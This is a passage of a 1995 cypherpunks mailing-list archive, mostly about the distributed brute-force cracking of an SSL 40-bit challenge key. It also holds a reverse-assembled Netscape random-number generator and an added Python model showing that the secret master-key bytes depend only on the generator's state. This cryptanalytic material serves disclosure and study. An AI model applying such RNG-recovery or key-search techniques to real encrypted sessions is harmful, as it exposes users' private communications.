potentially *huge* amount of storage on the server.

Another alternative that comes to mind is to hand out segments with
unsolicited NAKs to some of the slower machines.  Since their
contribution to the overall search rate is small, there's less of a hit
taken by assigning them potentially redundant work.  As they provide
verification of the data reported as unsolicited NAKs, the server's
reputation data is improved, and the search can concentrate even more
on the unACKed segments.
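
Added example, not part of the message above and not the challenge server's code: the weighting scheme from its closing paragraphs, with weight 1/(n+1)^2 for a segment carrying n unsolicited NAKs from unique users. Class, method and user names are hypothetical, and the reputation rule (a reporter's weight grows by one each time an assignee confirms their NAK) is one assumed reading of the paragraph on reputation.

```python
import random

class SegmentServer:
    def __init__(self, n_segments, seed=0):
        self.rng = random.Random(seed)
        self.n = n_segments
        self.unsolicited = {s: set() for s in range(n_segments)}  # unique reporters
        self.history = {s: set() for s in range(n_segments)}      # everyone ever assigned
        self.outstanding = {}    # segment -> searcher currently working on it
        self.cleared = set()     # segments with a solicited NAK
        self.reputation = {}     # user -> weight of that user's unsolicited NAKs

    def weight(self, seg):
        """Inverse square of (reputation-weighted unsolicited NAKs + 1)."""
        n = sum(self.reputation.get(u, 1.0) for u in self.unsolicited[seg])
        return 1.0 / (n + 1.0) ** 2

    def request_work(self, searcher):
        # Skip cleared segments, segments awaiting a response, and any
        # segment this searcher has been given before.
        cands = [s for s in range(self.n)
                 if s not in self.cleared and s not in self.outstanding
                 and searcher not in self.history[s]]
        if not cands:
            return None
        seg = self.rng.choices(cands, weights=[self.weight(s) for s in cands])[0]
        self.outstanding[seg] = searcher
        self.history[seg].add(searcher)
        return seg

    def report_nak(self, user, seg):
        if self.outstanding.get(seg) == user:
            # Solicited: the server asked this user to search the segment.
            del self.outstanding[seg]
            self.cleared.add(seg)
            for u in self.unsolicited[seg] - {user}:
                self.reputation[u] = self.reputation.get(u, 1.0) + 1.0
            return "solicited"
        # Unsolicited: only lowers the segment's weight, never clears it.
        self.unsolicited[seg].add(user)
        return "unsolicited"

    def expire(self, seg):
        """Assignee never answered: make the segment assignable again."""
        self.outstanding.pop(seg, None)

def position_of_flooded_segment(seed, n_segments=20, target=7, reporters=3):
    """Constructed scenario: several users send unsolicited NAKs for one
    segment, then a single honest searcher works through the whole space.
    Returns (position at which the target was assigned, segments assigned)."""
    srv = SegmentServer(n_segments, seed)
    for i in range(reporters):
        srv.report_nak("anon%d" % i, target)
        srv.report_nak("anon%d" % i, target)   # repeat from same user: no effect
    order = []
    while True:
        seg = srv.request_work("honest")
        if seg is None:
            break
        order.append(seg)
        srv.report_nak("honest", seg)
    return order.index(target), len(order)

if __name__ == "__main__":
    positions = [position_of_flooded_segment(s)[0] for s in range(200)]
    print("mean assignment position of flooded segment:",
          sum(positions) / len(positions))
```

The flooded segment is pushed toward the end of the job but is still searched, which is the property the message is after: unsolicited NAKs can delay a segment, never remove it.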




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 30 Aug 95 05:01:58 PDT
To: cypherpunks@toad.com
Subject: Netsurfer Focus on Cryptography
Message-ID: <Pine.SUN.3.91.950829214915.11091B-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Netsurfer publishes free HTML "periodicals" delivered by email -- filled 
with the links the short articles refer to.  The latest one just hit my 
mailbox (with tags removed):

---------- Forwarded message ----------
Date: Tue, 29 Aug 95 17:45:39 PDT
From: editor-bounce@netsurf.com
Subject: Netsurfer Focus: Vol. 01, #03 (HTML)

Netsurfer Focus on Cryptography and Privacy

Wednesday, August 21, 1995 - Volume 01, Issue 03

TABLE OF CONTENTS

Intro to Cryptography
Cracking the Code
In ? We Trust - Key Certification
Postcards from Cyberspace - E-mail Issues
Digital Envelopes - Secure E-mail
The Pen is Mightier than the Electron - Export Issues
Hiding In Plain View - Steganography
Money Makes the World Go Round - Cash and E-money
No Names, Please - Anonymous Remailers
Big Iron, Big Brother - Database Drilling and Surveillance
It's B-a-a-ck! - Clipper and Digital Telephony
'Bots, Agents, and Wizards - Trusting Software
Information at Your Fingertips - Additional Resources
Inky Fingers - Print Resources


**********************************
Netsurfer Focus is currently a periodic supplement to Netsurfer
Digest and Netsurfer Tools.

Netsurfer Focus Home Page: http://www.netsurf.com/nsf/index.html

Back Issues:
If you would like to obtain copies of back issues or resource files 
(in HTML format only) via e-mail,
send mail to info-focus@netsurf.com
with "send crypto-index" in the body of the message.

To subscribe to Netsurfer Digest or Netsurfer Tools:

By WWW form: http://www.netsurf.com/nsd/subscribe.html
By e-mail: nsdigest-request@netsurf.com
Body:
     subscribe nsdigest-text
     subscribe nsdigest-html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ab411@detroit.freenet.org (David R. Conrad)
Date: Wed, 30 Aug 95 05:02:00 PDT
To: cypherpunks@toad.com
Subject: Re: SSL trouble
Message-ID: <199508300040.UAA07776@detroit.freenet.org>
MIME-Version: 1.0
Content-Type: text/plain




-----BEGIN PGP SIGNED MESSAGE-----

I wrote:
>"Daniel R. Oelke" <droelke@rdxsunhost.aud.alcatel.com> writes:
>>
>>   date "+%S %M 60 * + %H 3600 * + %j 86400 * + %y 31536000 * + p" | dc
>
>date +"%S %M 60 * + %H 3600 * + %j 1 - 86400 * + %y 70 - 31536000 * + %y 
>69 - 4 / 86400 * + 3600 4 * + p" |dc

which has a bit of cruft in it to get universal time, and

>date +"%S %M 60 * + %H 3600 * + %j 1 - 86400 * + %y 70 - 31536000 * + %y
>69 - 4 / 86400 * + p" |dc
>
>which returns local time, which is probably what you wanted anyway.

Well, I overlooked the obvious: You can simply add -u to the above to get
universal time i.e., date -u +... etc.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMEOyexEcrOJethBVAQGtFwP9GG27cR3UvJX4/gsO8SK3L3pHGv5mjNp+
0mkRwOg+bj+cf44xAxXZ7/iFU2xaT4sAUvqwIaqbv6AfQgwnqTjAZKIR11KtlKPN
1xDkPXArU4PWSjoFal60Qsuqzacauu99wwUfsILhr8S2xWMj406JdTZPMapgZJI0
N2agSYMj6pY=
=LI+M
-----END PGP SIGNATURE-----

--
David R. Conrad, ab411@detroit.freenet.org, http://www.grfn.org/~conrad
Finger conrad@grfn.org for PGP 2.6 public key; it's also on my home page
Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
Jerry Garcia, August 1, 1942 - August 9, 1995.  Requiescat in pace.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Johnson <mpj@csn.net>
Date: Tue, 29 Aug 95 19:20:12 PDT
To: cypherpunks@toad.com
Subject: Colorado Catacombs BBS: 303-772-1062
Message-ID: <Pine.3.89.9508292053.A22709-0100000@teal.csn.net>
MIME-Version: 1.0
Content-Type: text/plain



Please note that the correct number for the Colorado Catacombs BBS is
303-772-1062.  I have been getting a lot of people calling my home voice 
phone number with a modem, and this is not fun, especially with those who 
do so at weird times and without their speaker engaged.

Also, note that the old number for the Colorado Catacombs, 303-938-9654, 
has been disconnected due to lack of funds for the BBS.  Sorry about 
that, but in true cypherpunk style, I want to keep the BBS up and running 
with free service for fellow cypherpunks, so I rely on donations instead 
of subscriptions.

Colorado Catacombs BBS - 303-772-1062  (2 lines, same number)
8 data bits, 1 stop bit, no parity, up to 28,800 bps (one modem is 
28,800, the other is 14,400), ANSI terminal emulation.  Access for all 
crypto files is free (in the USA and Canada), and you may use a pseudonym 
to log in if you like.  (I do ask for your real name, but that is for my 
own reference in evaluating uploads).

By the way, web lovers try http://www.csn.net/~mpj for pgp info.

Enjoy!
                  ___________________________________________________________
                 |                                                           |
 |\  /| |        | Michael Paul Johnson  Colorado Catacombs BBS 303-772-1062 |
 | \/ |o|        | PO Box 1151, Longmont CO 80502-1151 USA   Jesus is alive! |
 |    | | /  _   | mpj@csn.org aka mpj@netcom.com m.p.johnson@ieee.org       |
 |    |||/  /_\  | ftp://ftp.csn.net/mpj/README.MPJ          CIS: 71331,2332 |
 |    |||\  (    | ftp://ftp.netcom.com/pub/mp/mpj/README  -. --- ----- .... |
 |    ||| \ \_/  | PGPprint=F2 5E A1 C1 A6 CF EF 71  12 1F 91 92 6A ED AE A9 |
                 |___________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Loofbourrow <loofbour@cis.ohio-state.edu>
Date: Tue, 29 Aug 95 17:26:32 PDT
To: cypherpunks@toad.com
Subject: Re: Decoder ring
In-Reply-To: <Pine.SUN.3.91.950829093407.21598A-100000@panix.com>
Message-ID: <199508300026.UAA28443@colon.cis.ohio-state.edu>
MIME-Version: 1.0
Content-Type: text/plain


dmandl@panix.com writes:
 >      High-Tech Company Goes Back to the Future with Decoder Rings
 > The Stuff of Cereal Box-Tops Becomes Real Repository of Data and Computer ID

There's a press release at the DalSemi site that describes the
technology in more detail. They embed Touch Memory chips in other
items too, as you'll see if you follow the links.

http://www.dalsemi.com/News_Center/Press_Releases/1995/ring.html

The various chips they supply are as interesting as the carriers:
simple serial numbers in ROM, or the 64k NVRAM mentioned in the
article, or write-once PROMs, or versions that require passwords
(using unspecified decryption), or versions that block access after a
certain date, time, or number of accesses have been achieved.

Fascinating bit of technology. It even has crypto relevance!

nathan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ab411@detroit.freenet.org (David R. Conrad)
Date: Tue, 29 Aug 95 17:39:40 PDT
To: cypherpunks@toad.com
Subject: Re: Pre-allocating key segments
Message-ID: <199508300039.UAA07603@detroit.freenet.org>
MIME-Version: 1.0
Content-Type: text/plain




This was supposed to go out yesterday, but I mistyped the address.

-----BEGIN PGP SIGNED MESSAGE-----

Piete Brooks <Piete.Brooks@cl.cam.ac.uk> writes:
>I wrote:
>> ... but I still think the
>> prefetching of some more segments would be useful.
>
>I'm seeing calls from calpoly.edu and albany.net taking less than a second.
>Are you **REALLY** worried about wasting that sort of time, when even a single
>segment usually takes a quarter of an hour even on the faster machines ?

Wow, I knew it had been sped up, but I didn't realize...
You've convinced me.  :-)

>[ Getting down to the implementation details
>  1) it would be hard for brloop to know that brutessl is 3/4s done.
>  2) I can't think how to do prefetching in a safe way, and without disc use
>]

Good points.  Never mind the pre-allocation.

Abashed,

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMEKVMREcrOJethBVAQENBQP5AeM1crT8+fqAkWKtFPQHi+ljbP2cwnIy
36jcC4WCQVdKtor5hZZu+0yfyENAirGI6SKFesJFrRi9avMHmOYTo2QTvnhZQYy/
patw2wRXDwrfWY6ndklmssROM59pLhZmngkMlIzEd1QVrmy2YGbKnJOvzIrUwaYL
rGzztIzvLVo=
=UAte
-----END PGP SIGNATURE-----

--
David R. Conrad, ab411@detroit.freenet.org, http://www.grfn.org/~conrad
Finger conrad@grfn.org for PGP 2.6 public key; it's also on my home page
Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
Jerry Garcia, August 1, 1942 - August 9, 1995.  Requiescat in pace.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ab411@detroit.freenet.org (David R. Conrad)
Date: Tue, 29 Aug 95 17:41:16 PDT
To: cypherpunks@toad.com
Subject: Re: Florida Drivers Permits and a Hello
Message-ID: <199508300041.UAA08060@detroit.freenet.org>
MIME-Version: 1.0
Content-Type: text/plain




-----BEGIN PGP SIGNED MESSAGE-----

Scott Brickner <sjb@austin.ibm.com> writes:
>What possible value could the LEAs get by having your thumbprint digitally
>encoded on your driver's license?  It's not like the average cop-on-the-beat
>is qualified to lift a fingerprint and compare it.  Even if he was, how
>does it benefit that the fingerprint is on the license?

One benefit to law enforcement, quite apart from the ability to verify a
license, would be the accumulation of a database of thumbprints of all
citizens, or at least all those who drive.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMEOxbBEcrOJethBVAQGnjAP/dPUwWKt+c5+wbg4O4aqoOSQrVjyXiM1j
Vh/devoIQmLuVnTD8AAoUFahLtUmEByyKa/uz2hnJgIu1+y0OJevbALrjFdex6Wm
xqGr70d6ShN65DMOcMVeRvg9MtbhHAt1ktk4+92vUt7AttgqQ5DKsFoAyBVs0SRL
gAQ12b71Hfs=
=AMKA
-----END PGP SIGNATURE-----

--
David R. Conrad, ab411@detroit.freenet.org, http://www.grfn.org/~conrad
Finger conrad@grfn.org for PGP 2.6 public key; it's also on my home page
Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
Jerry Garcia, August 1, 1942 - August 9, 1995.  Requiescat in pace.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 29 Aug 95 18:42:56 PDT
To: Brad Dolan <bdolan@use.usit.net>
Subject: Re: Florida Drivers Permits and a Hello
In-Reply-To: <Pine.SOL.3.91.950829165337.3285A-100000@use.usit.net>
Message-ID: <Pine.SUN.3.91.950829213504.11091A-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 29 Aug 1995, Brad Dolan wrote:

> And somebody, Science Applications International Corp. I think, is 
> designing an in-car fingerprint reader / database query-er for cops.  So 
> they can check your bona fides on the road sides.
> 
> bd

It's too bad for law enforcement that the Chadian driver's license I use 
doesn't have any fingerprints on it and was obtained without requiring the 
surrender of any "finger images." 

DCF

"Yes Virginia, heroic Chad fighters equipped with French 
shoulder-launched missiles and Toyota Pickups did, in fact, defeat a 
Libyan armored invasion force."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Tue, 29 Aug 95 23:04:26 PDT
To: cypherpunks@toad.com
Subject: SSL and MIPS...
Message-ID: <199508300604.XAA10663@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



Hi!

How much computing power did we actually
use, in terms of MIPS/FLOPS*hours?

An unloaded SS10 that didn't swap went at
approximately 16400 keys/s. How many
MIPS is an SS10 approximately?

How do different algorithms compare?
DES, RC40, RSA512 etc?

Or if I pose the question differently,
what can you do with 30 GIPS for a day?

/Christian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 29 Aug 95 23:56:59 PDT
To: cypherpunks@toad.com
Subject: FYI: c2.org now has reasonable net
Message-ID: <199508300652.XAA10601@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	Community ConneXion finally has reasonable net. If you thought
about getting an account here in order to take advantage of privacy
services but thought that the lag was too great for it to be useful,
you may want to try again now, as our network line was just upgraded
today.
	Check out http://www.c2.org

-- 
sameer						Voice:   510-601-9777
Network Administrator				FAX:	 510-601-9734
Community ConneXion: The NEXUS-Berkeley		Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "P.J. Ponder" <ponder@wane-leon-mail.scri.fsu.edu>
Date: Tue, 29 Aug 95 20:53:27 PDT
To: cypherpunks@toad.com
Subject: SSL brute/ng
Message-ID: <Pine.3.89.9508292354.C13222-0100000@wane3.scri.fsu.edu>
MIME-Version: 1.0
Content-Type: text/plain



If anyone is putting together a wish list of features for the next 
iteration of the distributed brute would they like to consider some sort 
of mirroring approach for the server (at least on stats or updates/ 
software ) so that some of that traffic could be reduced?  I'm afraid I 
am one of the guilty trying to log on to check on the stats at least once 
and I probably contributed to choking it just by doing that.  If a local 
server could have been updated, it would save bandwidth on the server 
doing real work.

Could a trusted group of segment dolers be put together? I like the idea 
of running a benchmark type of program so that I could multiply keys/sec 
times the amount of time I had to donate, and only get a reasonable for 
me number of segments.

I would hope that statistics be gathered on the number of keys tested, 
elapsed time, etc. so that we all got some more or less real world 
insight into key lengths and strengths, effort required to break, that we 
have all heard so many projections about... especially as the doling gets 
more sophisticated and the number of participants/cycle pool increases.
Will there be Hal3?  

Just to ask a really dumb question, how do you know when you get the key?
Is there some plaintext header string you're looking for?  --pjp




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Will French <wfrench@interport.net>
Date: Tue, 29 Aug 95 21:00:00 PDT
To: sjb@austin.ibm.com
Subject: Re: SSL trouble
Message-ID: <199508300356.XAA09408@interport.net>
MIME-Version: 1.0
Content-Type: text/plain



Scott Brickner writes:
> We've identified several forms of "real-world retaliation:"

> 1) "Result hoarding" - failure to report a found key
> 2) "Segment hoarding" - requesting more segments than one can hope to search
> 3) Denial of service - preventing access to the server

  Perhaps I wasn't clear... by real-world retaliation, I'm
referring to being sued, thrown in jail, belabored about the
head with blunt objects, etc.  The three basic defenses I have
are: (a) not getting people angry, (b) not letting them know who
to be angry at, or (c) the threat of counter-retaliation.  The
"random" method is of type (b).

  I think you are focusing a bit too much on theoretical
efficiency and not enough on bottom-line practicality.  A 37%
waste factor is better than staying in bed and wasting it all.

>>   I _don't_ care about the procedures, as long as I can get
>> the information I need to go my own way.

> So what information wouldn't you be getting?  To "go your own
> way", you need exactly the same information that the client
> workstations use to test one key.  The difference in your code
> and the clients exists solely in how they determine the next
> key to try.

Yes, this is currently true, but there was a suggestion of
withholding part of the challenge in order to keep people honest,
or something like that.  I didn't quite understand it, but I
didn't like it.


Will French  <wfrench@interport.net>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: don@cs.byu.edu
Date: Tue, 29 Aug 95 23:23:01 PDT
To: cypherpunks@toad.com
Subject: CFS and Securedrive
Message-ID: <199508300622.AAA02022@wero>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

From: Patrick Lear <plear@ekrl.COM>

>Does anyone have any experience with the SecureDrive program and if so 
>can you make any comments about it?

I found it very easy to use and very well designed. My only complaint
was that it prints out a * every time you enter a character of your
passphrase. Other than that, it's a very good product. Too bad 
Wollersheim didn't have it for his client list...

Unfortunately, I switched to linux shortly afterwards. I have yet to
get CFS compiled. (Oh, Matt, by the way, is that README.linux supposed
to be current, because it's a little...errr...cryptic.) For those
of you who would like to see CFS, the unix encryption system, some
dastardly felon exported it and it's on utopia.hacktic.nl. (I did a diff 
against it with my copy, by the way, and it _hasn't_ been tampered with)

Don

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMEQDU8La+QKZS485AQEVewMAxN56v4mUZoe5AJSt64ZLRS+KwPiyG/WU
3PxTFGNjxL7l36Z4o2BMN6Bc195gYcxSUfjzvnfegN7gQU2/96IiNLd5b2QTsWJA
WW56L92yJkxWYeYoQRRhRP1+Emj2fqaX
=aU+M
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: don@cs.byu.edu
Date: Tue, 29 Aug 95 23:54:30 PDT
To: cypherpunks@toad.com
Subject: Re: SSL stuff
Message-ID: <199508300653.AAA02079@wero>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Piete: please read the PS at the bottom

From: Scott Brickner <sjb@austin.ibm.com>

>>A random (instead
>>of sequential) allocation _by the keyserver_ (out of unallocated 
>>piecemeal segments) would also take some work to implement. 
[snip]
>The problem is that it's irrelevant to the problem.  Random allocation
>at the server is equivalent to simply "shuffling" the segments before
>assignment, which doesn't affect the rate at which the space is searched.

no, but it keeps someone from knowing where the key is at from grabbing
it for themselves. If the segments were shuffled, the only way to ensure
"getting" the keyspace with the key is to grab HUGE chunks. And grabbing
50,000 segments didn't go over well last time, did it...


>I'm not sure I follow you, here.  The search wraps around on the unACKed
>segments because the work was assigned, but not (as far as the server
>knows) completed.  This doesn't slow down the discovery of the key,

If the segment with the real key is the first assigned and the last ACKed
(reporting key found), the search went on 30 hours extra. But that doesn't
cause as much problems as a (false) ACK of no key found. 

>>It would be nice to be able to hit the emergency button and switch to
>>random mode, but currently I don't think there's a need to actually
>>use it.

>I still don't see how the server can use unsolicited NAKs as anything
>other than a nominal reduction in the probability that the key is in
>the NAKed segment.  Perhaps this does give an idea of a server strategy
>to do *just* that, though.

I mean a setup where if the key server is shut down by a D.O.S. attack,
or congestion, or whatever, that the users, if they so desire, can shift
into random mode and end their dependence on the server. I don't see
a need for all of us to be doing random searches right now just because
someone _might_ launch a D.O.S. attack. Another benefit of random mode
being implemented, but secondary, is that all of the people who previously
had to manually get keyspace by WWW and report it back by hand - they
can just put it in random mode and fire-and-forget, just like everyone
with brloop does. 

Don

PS: Piete: What's the current status of the server? I've got my brloop
working apparently, and I calculate I'm able to search 800 segments a day,
and I'm anxious to see if it works. It's stopped giving me only sleep
orders, and now appears to give me a keyspace, but it reports a checksum
error and sleeps for a few minutes. 

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMEQKzsLa+QKZS485AQEjjgL/X2jQ0J0k+0gc4GUOzNQrKKtRHvqy4dlq
FmxaGDsdnBI+eO8DSu8C6jmRdw+VpcRiFQGDiTMklSmKNEwEqwq0QIvL0Dh4mz7k
vTsYXbUdlGwf9KUJv5PtwNojP+nQl9Pe
=tTkz
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Goldberg <iagoldbe@csclub.uwaterloo.ca>
Date: Tue, 29 Aug 95 22:13:04 PDT
To: cypherpunks@toad.com
Subject: Netscape's RNG
Message-ID: <199508300512.BAA23185@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


Someone on the list (sorry, I forget who), suggested that Netscape's RNG
be looked at to see if the secret part of the SSL RC4/40 master key could
be determined more directly.

I used gdb on the Solaris version.  SSL_GenerateRandomBytes() is called
when random bytes are needed.  It initializes the RNG, if necessary, and then
calls RNG_GenerateRandomBytes.

When I run "netscape https://banking.wellsfargo.com/",
SSL_GenerateRandomBytes() is called 3 times; the first time, 32 bytes
are produced (I don't know what they're for); the second time, 16 bytes
are produced (the Challenge data); the third time, 64 bytes are produced,
the first 16 of which are the master key (the first 11 of which are sent
in the clear, and the next 5 are our goal).

Here's my own hand-reverse-assembly of RNG_GenerateRandomBytes:
(Correctness not actually guaranteed in any way...)

-----8<-----8<-----
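#include <string.h>

/* MD5_Begin, MD5_Update and MD5_End are routines inside the Netscape
   binary; they are called here as seen in the disassembly. */

struct RNG
{
    unsigned char md5bytes[0x10];   /* state fed to MD5_Update */
    unsigned char randbytes[0x10];  /* buffer the callers are served from */
    int size;                       /* unread bytes left in randbytes */
    void *md5data;                  /* MD5 context */
};

int RNG_GenerateRandomBytes(struct RNG *i0, char *i1, int i2)
{
    char buf[0x20];
    unsigned char *o1;
    int o2, err;

    while (i2 > i0->size)
    {
        /* hand out what is left of randbytes, then refill it */
        memcpy(i1, i0->randbytes + 0x10 - i0->size, i0->size);
        i1 += i0->size;
        i2 -= i0->size;
        if ((err = MD5_Begin(i0->md5data))) return err;
        if ((err = MD5_Update(i0->md5data, &(i0->md5bytes), 0x10))) return err;
        if ((err = MD5_End(i0->md5data, &(i0->randbytes), buf, 0x10))) return err;
        i0->size = 0x10;
        /* step md5bytes, last byte first, before the next refill */
        o2 = 0;
        o1 = &(i0->md5bytes[0x0f]);
        do
        {
            if ((*o1)++) break;
            --o1;
        } while (++o2 <= 0x0f);
    }

    /* i2 <= i0->size */
    memcpy(i1, i0->randbytes + 0x10 - i0->size, i2);
    i0->size -= i2;
    return 0;
}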
-----8<-----8<-----

It looks like that Compilers course came in handy...

So it's not linear congruential.  I guess the next step is to figure out
how it's seeded, but that's not for me to do (at least not tonight...).

Here's another question about a more direct method:
The 5 secret bytes are encrypted with the server's public (RSA?) key.
Does the server use the same public key every time?  How do you read
the public key, given the Certificate Data (what's the format of the
certificate)?  Is it feasible to try to attack the public key with a
massively parallel (Internet) factoring program (a la RSA-129)?
Assuming that the modulus is _big_, it still is worthy to note that,
unlike cracking individual challenges, cracking the public key will
compromise _all_ communications with that server (until they catch on
and pay $$$ for another key (I think?)).

Just some thoughts,

   - Ian "it's only 10pm _here_, but it's 2am in Nova Scotia!"
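
A Python model of the generator as transcribed in the message above, added here as an illustration (it is not code from the post or from Netscape): it shows that every output byte, including the 5 secret master-key bytes, is a function of the 16-byte md5bytes state alone, so the session key is only as unpredictable as the seeding. Assumptions: the buffer starts empty, the state is stepped as a big-endian +1 counter, and the names ModelRNG and handshake_values are made up for this example.

```python
import hashlib


class ModelRNG:
    """Model of the transcribed RNG_GenerateRandomBytes (assumed semantics)."""

    def __init__(self, state: bytes):
        if len(state) != 16:
            raise ValueError("md5bytes state is 16 bytes")
        self.md5bytes = bytearray(state)   # the only secret in the generator
        self.randbytes = bytes(16)         # last MD5 output
        self.size = 0                      # unread bytes left in randbytes

    def _refill(self):
        # randbytes = MD5(md5bytes); 16 fresh bytes become available
        self.randbytes = hashlib.md5(bytes(self.md5bytes)).digest()
        self.size = 16
        # Assumption: md5bytes is a big-endian counter stepped by one.
        for i in range(15, -1, -1):
            self.md5bytes[i] = (self.md5bytes[i] + 1) & 0xFF
            if self.md5bytes[i]:
                break                      # no carry into the next byte

    def generate(self, n: int) -> bytes:
        out = bytearray()
        while n > self.size:
            # hand out the unread tail of the buffer, then refill
            out += self.randbytes[16 - self.size:]
            n -= self.size
            self._refill()
        start = 16 - self.size
        out += self.randbytes[start:start + n]
        self.size -= n
        return bytes(out)


def handshake_values(state: bytes) -> dict:
    """Replay the three calls observed in the post: 32, 16 and 64 bytes."""
    rng = ModelRNG(state)
    first32 = rng.generate(32)             # purpose unknown in the post
    challenge = rng.generate(16)           # Challenge data
    third = rng.generate(64)
    master_key = third[:16]
    return {
        "first32": first32,
        "challenge": challenge,
        "master_key": master_key,
        "clear": master_key[:11],          # sent in the clear
        "secret": master_key[11:16],       # the 40 secret bits
    }


if __name__ == "__main__":
    state = bytes(15) + b"\xfd"            # constructed sample state
    a = handshake_values(state)
    b = handshake_values(state)
    print("secret bytes :", a["secret"].hex())
    print("reproducible :", a == b)
```

The design lesson is that hashing a counter adds no entropy: a generator of this shape needs a seed with at least as many unpredictable bits as the key it is asked to produce.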



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tibbs@sina.hpc.uh.edu (Jason L Tibbitts III)
Date: Wed, 30 Aug 95 00:21:04 PDT
To: cypherpunks@toad.com
Subject: Mondex and currency exchange (Was: An article for Wired magazine)
In-Reply-To: <950814205254_74774.3663_EHL102-1@CompuServe.COM>
Message-ID: <9508300711.AA14904@hpc.uh.edu>
MIME-Version: 1.0
Content-Type: text/plain


Pardon me for being behind; I'm catching up with 1500 cypherpunks
articles...  I was skimming and came upon the following:

>>>>> "JM" == Jon Matonis <74774.3663@compuserve.com> writes:

JM> Mondex in the UK currently has official government units of account
JM> digitally represented for their Mondex card trial in Swindon.  They
JM> have also announced that in the future this card will hold up to five
JM> "official" currencies.

I'm not sure how Mondex works, but if currency conversion is made easy
doesn't this have an interesting effect on the currency markets?  If I can
have my machine follow micro changes in the markets and convert my money
around instantaneously without going through a middle-man then things could
get interesting.  Then again, I'm really naive when it comes to currency
exchange.

Please show me the flaw here.
---
  Jason L. Tibbitts III - tibbs@uh.edu - 713/743-8687 - 221SR1
System Manager:  Texas Center for Advanced Molecular Computation 
            1994 PC800 "Kuroneko"      DoD# 1723




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Wed, 30 Aug 95 00:51:44 PDT
To: cypherpunks@toad.com
Subject: Re: The illegal markets of cyberspace
Message-ID: <199508300751.AAA03910@mailhost.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Thank you for the easy to understand concepts.

Now where was that nobody@nobody.org key again?

Love Always,

Carol Anne....wondering if the Undernet was as good as the Blacknet?
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: goedel@tezcat.com (Dietrich J. Kappe)
Date: Wed, 30 Aug 95 01:13:33 PDT
To: cypherpunks@toad.com
Subject: SSL Suggestions
Message-ID: <v01510101ac69da47ea63@[206.1.161.4]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Many people have suggested improvements to the technical side of brutessl.
I don't think anyone has looked at the user interface side of things. A
simple configure script, and a few more reasonable defaults would bring
quite a few more volunteers. I know of at least a handful of people who did
not contribute because they were overwhelmed by the unfriendly scripts.

While a rough user interface could serve as a basic intelligence test, I
don't think that this sort of exclusion is necessary, given the nature of
the task.

DJK

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBgAwUBMEQrvHIf3YegbdiBAQE1pAJYnoXhffJeTrfiEm8R1fDGMuuZCpATw9gL
M+A+LawHiPFeoHtcHp3ZBkhzOqEFS6MfMJ1wjbt9e3ILSJkVGC71OrkpiNcDBMKY
0G9G
=3NIJ
-----END PGP SIGNATURE-----

Dietrich J. Kappe | Red Planet    http://www.redweb.com/
Red Planet, L.L.C.|         "Chess Space"              /chess
1-800-RED 0 WEB   |      "MS Access Products"          /cobre
Web Publishing    |        PGP Public Key              /goedel/key.txt







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: remailer@flame.alias.net (Remailer@flame.alias.net)
